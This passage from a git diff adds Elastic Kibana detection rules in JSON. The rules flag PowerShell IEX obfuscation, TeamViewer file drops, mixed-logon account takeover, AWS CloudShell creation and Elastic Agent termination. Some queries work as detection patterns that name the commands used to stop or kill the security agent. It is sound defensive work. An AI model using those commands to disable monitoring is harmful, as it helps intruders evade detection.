techniques. By analyzing script length and specific patterns, the rule effectively flags potential misuse, aiding in defense against such evasion tactics.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script, focusing on how environment variables are manipulated to reconstruct the IEX command.\n- Examine the file.path and host.name fields to determine the origin and location of the script execution, which can provide context on whether the activity is expected or suspicious.\n- Analyze the user.id and agent.id fields to identify the user and agent responsible for executing the script, checking for any anomalies or unauthorized access.\n- Investigate the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other related PowerShell activities on the host.\n- Assess the count field to understand the extent of obfuscation patterns detected, which can indicate the complexity and potential maliciousness of the script.\n\n### False positive analysis\n\n- Scripts with legitimate use of environment variables for configuration management may trigger the rule. Users can create exceptions for specific scripts or processes known to use environment variables in a non-threatening manner.\n- Automated scripts that dynamically construct commands for legitimate administrative tasks might be flagged. Review the script's purpose and source, and whitelist trusted scripts or processes.\n- Development environments where scripts are frequently tested and modified may produce false positives. Implement monitoring exclusions for development machines or specific user accounts involved in script testing.\n- Scripts using environment variables for localization or language settings can be mistakenly identified. Identify and exclude scripts that are part of standard localization processes.\n- PowerShell scripts from trusted vendors or software packages that use environment variables for legitimate functionality should be reviewed and excluded from detection if verified as safe.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further execution of potentially malicious scripts and limit lateral movement.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Review the PowerShell script block text and associated file paths to understand the scope and intent of the script, focusing on any obfuscated commands or environment variable manipulations.\n- Restore the system from a known good backup if malicious activity is confirmed and system integrity is compromised.\n- Update endpoint protection and intrusion detection systems to recognize and block similar obfuscation patterns in PowerShell scripts.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement additional monitoring for unusual PowerShell activity and environment variable manipulations to enhance detection of similar threats in the future.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"(?i)(\\$(?:\\w+|\\w+\\:\\w+)\\[\\d++\\]\\+\\$(?:\\w+|\\w+\\:\\w+)\\[\\d++\\]\\+['\"]x['\"]|\\$(?:\\w+\\:\\w+)\\[\\d++,\\d++,\\d++\\]|\\.name\\[\\d++,\\d++,\\d++\\])\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "b0c98cfb-0745-4513-b6f9-08dddb033490", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 7 - }, - "id": "b0c98cfb-0745-4513-b6f9-08dddb033490_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_217.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_217.json new file mode 100644 index 00000000000..a0117770fa5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_217.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable or script file remotely downloaded via a TeamViewer transfer session.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy via TeamViewer", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"cmd\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"jse\", \"wsh\", \"wsf\", \"sct\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\TeamViewer\\\\CustomConfigs\\\\???????\\\\TeamViewer_Resource_??.dll\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\TeamViewer\\\\CustomConfigs\\\\???????\\\\TeamViewer*.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "references": [ + "http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + }, + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 217 + }, + "id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee_217", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e_2.json b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e_2.json new file mode 100644 index 00000000000..cf21d26c6c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e_2.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected).", + "from": "now-15m", + "interval": "14m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential Account Takeover - Mixed Logon Types", + "note": "## Triage and analysis\n\n### Investigating Potential Account Takeover - Mixed Logon Types\n\nA high-volume account (e.g. service account tied to a specific logon type such as Batch or Network) that also shows successful logons with a different logon type and low count may indicate credential compromise and use from a new context (account takeover or misuse).\n\n### Possible investigation steps\n\n- Confirm with the account owner or service owner whether the additional logon type is expected (e.g. new automation, RDP for maintenance).\n- Review which logon types appear in Esql.logon_type_values and which has the low count (likely the anomalous one).\n- Correlate with other alerts for the same user (e.g. logon from new source IP, password changes, MFA changes).\n- Check whether the account is a known service account; if so, verify if any new scripts or systems were authorized to use it.\n\n### False positive analysis\n\n- Legitimate expansion of use (e.g. service account also used for occasional interactive logon for troubleshooting) can trigger this. Tune thresholds (e.g. max_logon >= 1000, min_logon <= 10) or add exclusions for known service accounts with documented multi-context use.\n- New scheduled tasks or automation that use a different logon type may cause a short-lived spike in the \"other\" logon type; review over a longer window if needed.\n\n### Response and remediation\n\n- If takeover or misuse is confirmed: force password reset, revoke sessions, rotate service account credentials, and restrict logon type or source where possible.\n- Investigate how credentials may have been compromised and address the vector.\n", + "query": "from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| WHERE event.category == \"authentication\" and event.action == \"logged-in\" and winlog.event_id == \"4624\" and\n event.outcome == \"success\" and not user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n to_lower(user.name) != \"administrator\"\n| STATS logon_count = COUNT(*), host_names = VALUES(host.name) by user.name, user.id, winlog.logon.type\n| STATS\n Esql.max_logon = MAX(logon_count),\n Esql.min_logon = MIN(logon_count),\n Esql.unique_host_count = COUNT_DISTINCT(host_names),\n Esql.host_name_values = VALUES(host_names),\n Esql.logon_type_values = VALUES(winlog.logon.type),\n Esql.count_distinct_logon_types = COUNT_DISTINCT(winlog.logon.type) by user.name, user.id\n\n// high count of logons is often associated with service account tied to a specific service, if observed in use with a different logon type it's suspicious\n| WHERE Esql.count_distinct_logon_types >= 2 and Esql.max_logon >= 1000 and (Esql.min_logon >= 1 and Esql.min_logon <= 10) and Esql.unique_host_count >= 2\n| EVAL winlog.logon.type = MV_FIRST(Esql.logon_type_values), host.name = MV_FIRST(Esql.host_name_values)\n| KEEP user.name, user.id, host.name, winlog.logon.type, Esql.*\n", + "references": [ + "https://attack.mitre.org/techniques/T1078/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.count_distinct_logon_types", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.logon_type_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.max_logon", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.min_logon", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.unique_host_count", + "type": "long" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b625c9ad-16e5-4f16-8d38-3e9631952554_1.json b/packages/security_detection_engine/kibana/security_rule/b625c9ad-16e5-4f16-8d38-3e9631952554_1.json new file mode 100644 index 00000000000..e2877c9649b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b625c9ad-16e5-4f16-8d38-3e9631952554_1.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a new AWS CloudShell environment. CloudShell is a browser-based shell that provides command-line access to AWS resources directly from the AWS Management Console. The CreateEnvironment API is called when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region. Adversaries with console access may use CloudShell to execute commands, install tools, or interact with AWS services without needing local CLI credentials. Monitoring environment creation helps detect unauthorized CloudShell usage from compromised console sessions.", + "false_positives": [ + "Legitimate use of CloudShell by administrators for routine AWS management tasks. Verify whether the user has a legitimate need for CloudShell access and correlate with recent console login activity. Environment creation also occurs when users access CloudShell in a new AWS region." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS CloudShell Environment Created", + "note": "## Triage and analysis\n\n### Investigating AWS CloudShell Environment Created\n\nAWS CloudShell is a browser-based shell environment that provides instant command-line access to AWS resources without requiring local CLI installation or credential configuration. While this is convenient for legitimate administrators, it also provides adversaries with a powerful tool if they gain access to a compromised AWS console session.\n\nThis rule detects when a CloudShell environment is created via the `CreateEnvironment` API. This event occurs when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region (each region maintains a separate environment). \n\n### Possible investigation steps\n\n- **Identify the actor**\n - Review `aws.cloudtrail.user_identity.arn` or `user.name` to determine which IAM principal created the CloudShell environment.\n - Check `aws.cloudtrail.user_identity.type` to identify whether this is an IAM user or an assumed role session.\n - Verify if this user typically performs command-line or administrative operations.\n\n- **Analyze the source context**\n - Review `source.ip` and `source.geo` fields to verify the request origin matches expected administrator locations.\n - Check `user_agent.original` to confirm the request came from a browser session.\n - Look for the preceding `ConsoleLogin` event to understand how the session was established.\n\n- **Correlate with surrounding activity**\n - Look for any IAM operations (CreateAccessKey, CreateUser, AttachRolePolicy) that occurred after CloudShell was accessed.\n - Check for data exfiltration patterns or reconnaissance activity from the same session.\n\n- **Assess the broader context**\n - Determine if this user has a legitimate need for CloudShell access based on their role.\n - Review recent access patterns for the console session that initiated CloudShell.\n - Check if MFA was used for the console login.\n\n### False positive analysis\n\n- Administrators routinely using CloudShell for AWS management tasks will trigger this rule. Consider tuning for known admin users if noise is a concern.\n- Users accessing CloudShell in a new AWS region will generate a `CreateEnvironment` event even if they have used CloudShell before in other regions.\n- Training or certification activities may involve CloudShell environment creation.\n\n### Response and remediation\n\n- If unauthorized, immediately terminate the console session to revoke CloudShell access.\n- Review and revoke any credentials or resources created during the CloudShell session.\n- Consider restricting CloudShell access via SCPs or IAM policies for sensitive accounts or users who do not require it.\n- Implement session duration limits to reduce the window of opportunity for console session abuse.\n- Enable MFA for all console logins to reduce the risk of session compromise.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/)**\n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n", + "query": "event.dataset: \"aws.cloudtrail\"\n and event.provider: \"cloudshell.amazonaws.com\"\n and event.action: \"CreateEnvironment\"\n and event.outcome: \"success\"\n", + "references": [ + "https://aws-samples.github.io/threat-technique-catalog-for-aws/Techniques/T1059.009.html", + "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b625c9ad-16e5-4f16-8d38-3e9631952554", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS CloudShell", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.009", + "name": "Cloud API", + "reference": "https://attack.mitre.org/techniques/T1059/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "b625c9ad-16e5-4f16-8d38-3e9631952554_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_113.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_113.json new file mode 100644 index 00000000000..cc70482b862 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_113.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Elastic Agent Service Terminated", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Elastic Agent Service Terminated\n\nThe Elastic Agent is a crucial component for monitoring and securing endpoints across various operating systems. It ensures continuous security oversight by collecting and analyzing data. Adversaries may attempt to disable this agent to evade detection, compromising system defenses. The detection rule identifies suspicious termination activities by monitoring specific processes and commands across Windows, Linux, and macOS, flagging potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the event logs to identify the exact process and command used to terminate the Elastic Agent, focusing on the process names and arguments such as \"net.exe\", \"sc.exe\", \"systemctl\", and \"pkill\" with arguments like \"stop\", \"uninstall\", or \"disable\".\n- Check the timeline of events around the termination to identify any preceding suspicious activities or anomalies that might indicate an adversary's presence or actions.\n- Investigate the user account associated with the process termination to determine if it was authorized or if there are signs of account compromise.\n- Examine the host for any other signs of tampering or compromise, such as unauthorized changes to system configurations or the presence of other malicious processes.\n- Verify the current status of the Elastic Agent on the affected host and attempt to restart it if it is not running, ensuring that security monitoring is restored.\n- Correlate this event with other alerts or logs from the same host or network to identify potential patterns or coordinated attack activities.\n\n### False positive analysis\n\n- Routine maintenance activities may trigger the rule if administrators use commands like systemctl or service to stop the Elastic Agent for updates or configuration changes. To manage this, create exceptions for known maintenance windows or authorized personnel.\n- Automated scripts or deployment tools that temporarily disable the Elastic Agent during software installations or updates can cause false positives. Identify these scripts and whitelist their execution paths or specific arguments.\n- Testing environments where Elastic Agent is frequently started and stopped for development purposes might generate alerts. Exclude these environments by specifying their hostnames or IP addresses in the rule exceptions.\n- Security tools or processes that interact with the Elastic Agent, such as backup solutions or system monitoring tools, might inadvertently stop the service. Review these interactions and adjust the rule to ignore specific process names or arguments associated with these tools.\n- User-initiated actions, such as troubleshooting or system performance optimization, may involve stopping the Elastic Agent. Educate users on the impact of these actions and establish a protocol for notifying the security team when such actions are necessary.\n\n### Response and remediation\n\n- Immediately isolate the affected host from the network to prevent further unauthorized access or potential lateral movement by adversaries.\n- Verify the status of the Elastic Agent on the affected host and attempt to restart the service. If the service fails to restart, investigate potential causes such as corrupted files or missing dependencies.\n- Conduct a thorough review of recent process execution logs on the affected host to identify any unauthorized or suspicious activities that may have led to the termination of the Elastic Agent.\n- If malicious activity is confirmed, perform a comprehensive malware scan and remove any identified threats. Ensure that the host is clean before reconnecting it to the network.\n- Review and update endpoint security configurations to prevent unauthorized termination of security services. This may include implementing stricter access controls or using application whitelisting.\n- Escalate the incident to the security operations team for further analysis and to determine if additional hosts are affected or if there is a broader security incident underway.\n- Document the incident, including all actions taken and findings, to enhance future response efforts and update incident response plans as necessary.", + "query": "process where event.type == \"start\" and\n(\n /* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n (\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and\n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\")\n ) or\n\n /* service or systemctl used to stop Elastic Agent on Linux */\n (\n process.name in (\"systemctl\", \"service\", \"chkconfig\", \"update-rc.d\") and\n process.args : (\"elastic-agent\", \"elastic-agent.service\", \"ElasticEndpoint\") and\n process.args : (\"stop\", \"disable\", \"remove\", \"off\", \"kill\", \"mask\") and\n not (\n process.parent.executable : \"/opt/Elastic/Agent/data/elastic-agent-*/components/previous/elastic-endpoint\" and\n process.parent.args : \"uninstall\" and\n process.parent.args : \"--keepstate\"\n )\n ) or\n \n /* pkill, killall used to stop Elastic Agent or Endpoint on Linux */\n (process.name in (\"pkill\", \"killall\", \"kill\") and process.args : (\"elastic-agent\", \"elastic-endpoint\")) or\n\n /* Unload Elastic Defend extension on MacOS */\n (process.name : \"kextunload\" and process.args : \"com.apple.iokit.EndpointSecurity\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation 